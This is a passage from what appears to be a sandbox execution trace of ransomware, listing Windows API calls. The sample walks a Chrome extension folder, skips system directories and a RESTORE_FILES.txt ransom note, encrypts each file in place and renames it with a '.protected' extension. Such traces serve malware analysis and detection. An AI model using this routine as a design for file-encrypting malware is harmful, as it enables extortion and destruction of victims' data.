cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.protected") returned 162 [0080.873] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.protected")) returned 1 [0080.881] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.882] lstrcmpiW (lpString1="topbar_floating_button.png", lpString2="Windows") returned -1 [0080.882] lstrcmpiW (lpString1="topbar_floating_button.png", lpString2="Program Files") returned 1 [0080.882] lstrcmpiW (lpString1="topbar_floating_button.png", lpString2="Program Files (x86)") returned 1 [0080.882] lstrcmpiW (lpString1="topbar_floating_button.png", lpString2="$Recycle.bin") returned 1 [0080.882] lstrcmpiW (lpString1="topbar_floating_button.png", lpString2="System Volume Information") returned 1 [0080.882] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png") returned 167 [0080.882] StrStrIW 
(lpFirst="topbar_floating_button.png", lpSrch=".protected") returned 0x0 [0080.882] lstrcmpW (lpString1="topbar_floating_button.png", lpString2="RESTORE_FILES.txt") returned 1 [0080.882] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.882] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.882] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.882] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png") returned 167 [0080.882] StrStrW (lpFirst="topbar_floating_button.png", lpSrch=".txt") returned 0x0 [0080.882] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png") returned 167 [0080.883] StrStrW (lpFirst="topbar_floating_button.png", lpSrch=".rar") returned 0x0 [0080.883] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png") returned 167 [0080.883] StrStrW (lpFirst="topbar_floating_button.png", 
lpSrch=".zip") returned 0x0 [0080.883] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0xa0, lpOverlapped=0x0) returned 1 [0080.884] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffff60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.884] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0xa0, lpOverlapped=0x0) returned 1 [0080.884] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.884] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.884] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.884] CloseHandle (hObject=0x164) returned 1 [0080.884] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.protected") returned 177 [0080.884] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.protected")) returned 1 [0080.885] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.885] lstrcmpiW (lpString1="topbar_floating_button_close.png", lpString2="Windows") returned -1 [0080.885] lstrcmpiW (lpString1="topbar_floating_button_close.png", lpString2="Program Files") returned 1 [0080.885] lstrcmpiW (lpString1="topbar_floating_button_close.png", lpString2="Program Files (x86)") returned 1 [0080.885] lstrcmpiW (lpString1="topbar_floating_button_close.png", lpString2="$Recycle.bin") returned 1 [0080.885] lstrcmpiW (lpString1="topbar_floating_button_close.png", lpString2="System Volume Information") returned 1 [0080.885] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png") returned 173 [0080.885] StrStrIW (lpFirst="topbar_floating_button_close.png", lpSrch=".protected") returned 0x0 [0080.885] lstrcmpW (lpString1="topbar_floating_button_close.png", lpString2="RESTORE_FILES.txt") returned 1 [0080.885] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.886] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295db64*=0x30) returned 1 [0080.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.886] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png") returned 173 [0080.886] StrStrW (lpFirst="topbar_floating_button_close.png", lpSrch=".txt") returned 0x0 [0080.886] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png") returned 173 [0080.886] StrStrW (lpFirst="topbar_floating_button_close.png", lpSrch=".rar") returned 0x0 [0080.886] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png") returned 173 [0080.886] StrStrW (lpFirst="topbar_floating_button_close.png", lpSrch=".zip") returned 0x0 [0080.886] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0xfc, lpOverlapped=0x0) returned 1 [0080.887] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffff04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 
returned 1 [0080.887] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0xfc, lpOverlapped=0x0) returned 1 [0080.887] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.887] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.888] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.888] CloseHandle (hObject=0x164) returned 1 [0080.888] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.protected") returned 183 [0080.888] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.protected")) returned 1 [0080.889] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.889] lstrcmpiW (lpString1="topbar_floating_button_hover.png", lpString2="Windows") returned -1 [0080.889] lstrcmpiW (lpString1="topbar_floating_button_hover.png", lpString2="Program Files") returned 1 [0080.889] lstrcmpiW (lpString1="topbar_floating_button_hover.png", lpString2="Program Files (x86)") returned 1 [0080.889] lstrcmpiW (lpString1="topbar_floating_button_hover.png", lpString2="$Recycle.bin") returned 1 [0080.889] lstrcmpiW (lpString1="topbar_floating_button_hover.png", lpString2="System Volume Information") returned 1 [0080.889] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png") returned 173 [0080.889] StrStrIW (lpFirst="topbar_floating_button_hover.png", lpSrch=".protected") returned 0x0 [0080.889] lstrcmpW (lpString1="topbar_floating_button_hover.png", lpString2="RESTORE_FILES.txt") returned 1 [0080.889] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.889] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png") returned 173 [0080.889] StrStrW (lpFirst="topbar_floating_button_hover.png", lpSrch=".txt") returned 0x0 [0080.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png") returned 173 [0080.889] StrStrW (lpFirst="topbar_floating_button_hover.png", lpSrch=".rar") returned 0x0 [0080.890] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png") returned 173 [0080.890] StrStrW (lpFirst="topbar_floating_button_hover.png", lpSrch=".zip") returned 0x0 [0080.890] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0xa0, lpOverlapped=0x0) returned 1 [0080.890] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffff60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.891] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0xa0, lpOverlapped=0x0) returned 1 [0080.891] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | 
out: lpNewFilePointer=0x0) returned 1 [0080.891] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.891] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.891] CloseHandle (hObject=0x164) returned 1 [0080.891] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.protected") returned 183 [0080.891] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.protected")) returned 1 [0080.892] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.892] lstrcmpiW (lpString1="topbar_floating_button_maximize.png", lpString2="Windows") returned -1 [0080.892] lstrcmpiW 
(lpString1="topbar_floating_button_maximize.png", lpString2="Program Files") returned 1 [0080.892] lstrcmpiW (lpString1="topbar_floating_button_maximize.png", lpString2="Program Files (x86)") returned 1 [0080.892] lstrcmpiW (lpString1="topbar_floating_button_maximize.png", lpString2="$Recycle.bin") returned 1 [0080.892] lstrcmpiW (lpString1="topbar_floating_button_maximize.png", lpString2="System Volume Information") returned 1 [0080.892] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png") returned 176 [0080.892] StrStrIW (lpFirst="topbar_floating_button_maximize.png", lpSrch=".protected") returned 0x0 [0080.892] lstrcmpW (lpString1="topbar_floating_button_maximize.png", lpString2="RESTORE_FILES.txt") returned 1 [0080.892] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.892] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.894] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png") returned 176 [0080.894] StrStrW (lpFirst="topbar_floating_button_maximize.png", lpSrch=".txt") returned 0x0 [0080.894] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png") returned 176 [0080.894] StrStrW (lpFirst="topbar_floating_button_maximize.png", lpSrch=".rar") returned 0x0 [0080.894] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png") returned 176 [0080.894] StrStrW (lpFirst="topbar_floating_button_maximize.png", lpSrch=".zip") returned 0x0 [0080.894] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0xa6, lpOverlapped=0x0) returned 1 [0080.895] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffff5a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.895] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0xa6, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0xa6, lpOverlapped=0x0) returned 1 [0080.895] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.895] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.895] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.895] CloseHandle (hObject=0x164) returned 1 [0080.895] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.protected") returned 186 [0080.896] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.protected")) returned 1 [0080.896] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.896] lstrcmpiW (lpString1="topbar_floating_button_pressed.png", lpString2="Windows") returned -1 [0080.896] lstrcmpiW (lpString1="topbar_floating_button_pressed.png", lpString2="Program Files") returned 1 [0080.896] lstrcmpiW (lpString1="topbar_floating_button_pressed.png", lpString2="Program Files (x86)") returned 1 [0080.896] lstrcmpiW (lpString1="topbar_floating_button_pressed.png", lpString2="$Recycle.bin") returned 1 [0080.896] lstrcmpiW 
(lpString1="topbar_floating_button_pressed.png", lpString2="System Volume Information") returned 1 [0080.897] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png") returned 175 [0080.897] StrStrIW (lpFirst="topbar_floating_button_pressed.png", lpSrch=".protected") returned 0x0 [0080.897] lstrcmpW (lpString1="topbar_floating_button_pressed.png", lpString2="RESTORE_FILES.txt") returned 1 [0080.897] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.897] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.897] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png") returned 175 [0080.897] StrStrW (lpFirst="topbar_floating_button_pressed.png", lpSrch=".txt") returned 0x0 [0080.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
